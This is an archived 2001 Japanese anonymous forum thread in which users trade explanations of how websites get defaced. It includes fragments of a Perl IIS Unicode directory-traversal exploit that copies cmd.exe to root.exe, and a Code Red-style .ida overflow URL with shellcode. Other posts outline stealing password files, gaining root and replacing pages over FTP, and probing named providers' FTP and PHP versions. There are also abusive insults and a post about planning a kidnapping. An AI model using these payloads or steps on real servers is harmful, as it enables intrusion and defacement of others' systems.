1 :
POPPY:
よくホームページが書き換えられて問題になりますが
技術がどういうことか教えてね。
2 :
POPPY:2001/07/03(火) 21:04
age
だいたいIIS
終了
4 :
POPPY:2001/07/03(火) 21:09
IISってなあに?
Ichi ha ItteyoShi
I=インポチン
I=インポチン
S=氏ね
Internet Information Server
ここにいる連中にはわからんよ
>>9 おいおい1、教えてもらいたくて必死だな
頼むからageないでね
1は自分でやってみたいだけの厨房なので、
実際のテクニックを教えてあげる人はいませんよ。
終了
12 :
名無しさん@お腹いっぱい。:2001/07/04(水) 14:10
>>1 ローカル鯖をツクレ!!ドメインはハクしたいドメインをツクレ!!
DNS(ローカル用)ツクレ!!HTTPDタテロ!!ハクしたいWEBページを
根こそぎヒッパレ!!DNSにハクしたいAとPTRをアテロ!!ヨシ!!
オモウゾンブン!!改ざんシロ!!トモダチよんで思う存分自慢シロ!!
トモダチイマセン
14 :
名無しさん@お腹いっぱい。:2001/07/04(水) 14:35
ボクガミニイクヨ.
15 :
名無し:2001/07/04(水) 16:14
バッファオーバーフローでgoogle検索してみそ
16 :
名無しさん@お腹いっぱい。:2001/07/04(水) 17:21
>>1 ftpでHTMLファイルを転送するんだよ。
18 :
27:2001/07/05(木) 01:02
#!/usr/bin/perl
use Socket;
# --------------init
if ($#ARGV<0) {die "UNICODE-HACK-PROGRAM
Example: c:\\perl uni.pl www.theriver.com:80 {OR}
c:\\perl uni.pl 127.0.0.1:80\n";}
($host,$port)=split(/:/,@ARGV[0]);
print "Trying $host.....................\n";
$target = inet_aton($host);
$flag=0;
# ---------------test IF IIS
my @results=sendraw("GET x HTTP/1.0\r\n\r\n");
foreach $line (@results)
{
if ($line =~ /Server: Microsoft-IIS/)
{
19 :
27:2001/07/05(木) 01:04
sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe HTTP/1.0\r\n\r\n");
バッファオーバーフローで書き換えてんの?
それともバックドアをバッファオーバーフローで仕掛けるって事か?
21 :
27:2001/07/05(木) 01:19
UNICODE-HACK-PROGRAM
>>22 バッファオーバーフローは知ってるよ。
ただあふれた部分でhtml直接書き換えてんのかトロイしこんでんのか聞いてるだけだろ
24 :
22:2001/07/05(木) 01:33
>ただあふれた部分でhtml直接書き換えてんのか
とてもバッファオーバーフローを知ってるとは思えない(藁
>>24 バッファオーバーフローってそもそも名前の通りバッファからあふれるような
データを送りつけてバッファからあふれた分のデータが書き換えられるって仕組みだろ?
と思ったんだけど、root権限を乗っ取るのが一般的なのか。
とりあえずありがとう。
27 :
名無しさん@お腹いっぱい。:2001/07/05(木) 04:18
guest guest
28 :
名無しさん@お腹いっぱい:2001/07/05(木) 09:56
概念は簡単過ぎるほど簡単、様はチェックされてない所に長いデータ
送るだけだからね、でもそこでハッキングコード実行させるとなると
話は180度変わってきます。
スタックの積まれ方やエンディアンを意識した相当高度なPG技術が必要
です。俺はRETアドレスの上書きまでで挫折してしまった・・・・・
focusとか見てると凄いのが転がってるけど、思うにこの辺がちょっと
やりすぎなのかな、とか感じてるよ、最近。
やっぱり作ったものは公開したくなるのかな、あのレベルの人でも・・・
まあ公開しないと穴空きっぱなしだし
公開も悪いことじゃないよ。まあ悪用する
ハゲはどうにもなんねーけど
c使えんの前提か・・・はぁ。
>>30 c使えんの前提か・・・はぁ。
ではない。
アセンブラを使えるというのが大前提。
翻えって、マシン語そのものを打ち込む必要もあり。
さらには、サーバが使っているであろうC言語のマシン語レベルの
コーリングシーケンスの知識も必要。
32 :
名無しさん@お腹いっぱい。:2001/07/19(木) 05:48
その前に Webサーバ動いてないとダメじゃないの?
34 :
名無しさん@お腹いっぱい。:2001/07/19(木) 17:37
っていうか、まずどうやるのかすら全く予想もつかないんですけど。。。
相手のパソコンに侵入するんですか?マジでわからん。侵入するにも
このパソコンからどうやって侵入出来るんだろう。。。
35 :
1:2001/07/19(木) 17:55
趣味でバイオレス小説書いてます。
あれこれバイオレンスなシーンを考えるのが好きです。
で、いろいろ計画を立ててみました。拉致する
対象の行動のクセとか調べたり、拉致しておく
貸し別荘を匿名で借りたり。小道具など色々
そろえてみたり。
もちろん、計画するだけです。
実際にやっちゃったら犯罪だし、
完璧に計画たてても運悪くつかまったりする
かもしれないし。
小さな隙間から
ちゅるちゅると入っていきます
一連のIISの書き換えって
BoFなんてチトーモつかってないよ
ヴァカバッカ
単なるバグついただけだろが
まぁ落ち着け。BOFって騒いでいるのは1だけだろ。
39 :
jl;:2001/07/20(金) 00:03
/etc/passwd
もってきて、rootのパスを手に入れる。
ftpでログインしてindex.html書き換える。
shadowかかっていたら1の場合はあきらめろ。
クソ管理でshadowファイルのパーミッションが甘かったらまだいける。
恐ろしく特殊な環境が前提なんだね(w
41 :
なにがさ?:2001/07/20(金) 05:46
特殊だろうがなんだろうが、一連の手順を自動化させとけばいいだけじゃ。まさかプチプチ手作業想像してない?
42 :
名無しさん@お腹いっぱい。:2001/07/20(金) 08:04
>/etc/passwd
>もってきて
いや・・・そこまでの過程を教えて頂けたらありがたいんですけど。
42はアタマ悪いの?首吊って死んでね。
>>43 わかってる人間だから、
>>42な聞き方だと思ってるのは
漏れだけか?(藁
それがわかってない
>>43 逝ってよしと思ってるのも
漏れだけか?(藁
45 :
名無しさん@お腹いっぱい。:2001/07/20(金) 14:50
説明するとなると出来ない、赤面性かもね。
辛抱強い42
>>26 IISに効くらしい、InternetExplorerでアクセスするんだったら本望だろう(藁
http://www.microsoft.com/default.ida?NNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090
%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>>41 ・・・・・・・・・・・・いや、いいよ。それなら何も言うまい。
48 :
fuck ***.ne.jp:2001/07/21(土) 02:10
うちのプロバイダport23あいてるうえに、シャドウウイング処理してなかったよ。
バカ丸出しだ。
smtpでexpn、vrfyで本名参照できるし。本当にバカ丸出しだ。
調べてみたら高校卒業したばかりの19歳の少年が経営している地方プロバイダだった。
もうちょっと勉強してからやれよ。
ゲッ、まだそんなところが・・・最低だな
50 :
名無しさん@お腹いっぱい。:2001/07/21(土) 08:52
>>43 あんた天然?首吊って死ぬのはあんただよ。
そこからは厨房でも分かるよ。あなた何の事について話してるのかすら分かってないようですね。
一人だけ外れてるよ。まあ、厨房は放置しておきましょう。
>>44 あなただけというのではなく、
>>43が何もわかってないだけだと思います。
アホは放置しましょう。相手にするとつけ上がります。
51 :
名無しさん@お腹いっぱい。:2001/07/21(土) 09:22
ハクしました。
本当のことに書き換えたぞ。
h++p://www6.ocn.ne.jp/~channel2/about_ocn.html
50は一人で怒ってるけどさ。
やめときなよ、ハックなんて(ワラ
53 :
↑:2001/07/21(土) 17:29
日本語おかしいよ(ゲラゲラ
流石みんなから放置されるだけの事はあるね(ゲラゲラ
55 :
名無しさん@お腹いっぱい。:2001/07/29(日) 12:41
>>1 リモートバッファーオーバーフローさせてスーパーユーザー権限を取得する。
もしシェルを使えるのならtelnetでログインしてexploitコードを
コンパイルして走らせてスーパーユーザーになってください。
exploitコードは検索すればそこらじゅうから出てきます。
httpd.confでも見てwwwのドキュメントルートになってるディレクトリに
移動して別途に用意したindex.htmlをアップロードしておけばいいです。
概念的にはこんなかんじですが、実際やるのは面倒です。
人様に迷惑がかからないように、ローカルホストで遊んでください。
56 :
名無しさん@お腹いっぱい。:2001/07/29(日) 19:15
55さんはハッカーですか??
57 :
55:2001/07/29(日) 19:18
いいえ、所謂へたれです。
58 :
:2001/07/29(日) 20:54
/etc/passwdと書いてありますが、はてさて???
どうせなら/etc/shadowを取ってきましょう???
っつっても、モロcounterfeitっぽいけど
61 :
58:2001/07/29(日) 21:18
62 :
名無しさん@お腹いっぱい。:2001/07/30(月) 01:35
改ざんされているところって、ftp ftp-dataとかのポートは最初から空いてるの?
犯罪厨房発見!
64 :
sage:2001/07/30(月) 16:52
うちの会社一千万出してWEBサーバ立てたのにanonyで入れるようになってたわ。
入れるどころか書き換えも出来てたわ。
素敵。
66 :
ま゛:2001/07/30(月) 21:08
67 :
名無しさん@お腹いっぱい。:2001/07/31(火) 00:53
>>64 普通anonymousログイン以前に、ポート20,21,23は塞がないか。
やったのはどこの会社?
>67
E-マネージメントとかいう会社
ポートがふさがってないのはファイルの更新をFTPでするため。
71 :
りゅりゅ:2001/08/01(水) 19:28
>私も彼もパソコンにめっちゃ強いので
すげぇ。exploitください。
ふ〜ん、パソコンに強いんだ(w
WORDとEXCELのスペシャリストかな。怖い怖い
74 :
名無し:2001/08/01(水) 23:35
>>71 www6.plala.or.jpは外部FTPポートが空いていたけど
proftp1.2.1だった。さすがにplalaだけあって
セキュリティが高いのか?
しかしBBSのサーバがapache1.3.14+php3だから
php関係で攻めれそうだな
75 :
:2001/08/01(水) 23:40
>>73 Outlook Expressだと思われ
76 :
_____________________:2001/08/01(水) 23:50
>>71 71は74の内容を理解したのかな?
パソコンに強いんじゃ無理か(藁
^^^^^^^
77 :
名無しさん@お腹いっぱい。:2001/08/02(木) 00:24
>>72−76
こんな荒らし依頼ミエミエの書き込み、鵜呑みにすんなよ・・・
78 :
67:2001/08/02(木) 01:25
>>70 サンキューです。
そういえは、私の勤め先は3月にWeb書き換えられて新聞記事になりました。
79 :
名無しさん@お腹いっぱい。:2001/08/02(木) 20:08
三菱かな?
71のリンク先はともかく
71本人はその程度の知識を持ってるのかと思ったんだが、違うのか(藁
81 :
名無しさん@お腹いっぱい。:2001/08/03(金) 01:50
82 :
1:2001/08/03(金) 01:56
telnetってなあに?
83 :
名無しさん@お腹いっぱい。:2001/08/03(金) 02:00
telnet は telnet だぎゃあ。
みんな知ってる、みんな使ってる、楽しい telnet。
ネット猫を好む御仁もおるがのぉ。
84 :
うそぷー:2001/08/03(金) 02:22
うそぷー!
うそぷっぷー!
おいお前ら!
このクズども!
少しはGNPに貢献しろ、無駄に息吸って吐くな。
氏ね、氏ね、氏ね、氏ね!
86 :
名無しさん@お腹いっぱい。:2001/08/03(金) 02:35
嘘なんかついちゃおらんぞ。
ネット猫も知らんなら探してみるといい。あれもなかなかいいぞ。
87 :
:2001/08/09(木) 00:30
>>85 掲示板の趣旨と違う事を書く
のはマズいんじゃないの?
ま、荒らしが目的ならこんな
注意しても意味ないんだけどさ。
困ったもんだね(笑)。
88 :
あげ:2001/08/19(日) 19:03
あげ
>>74 proftpd1.2.1なら、セキュリティはざる
1.2.2に入れ替えるようにいうてやれ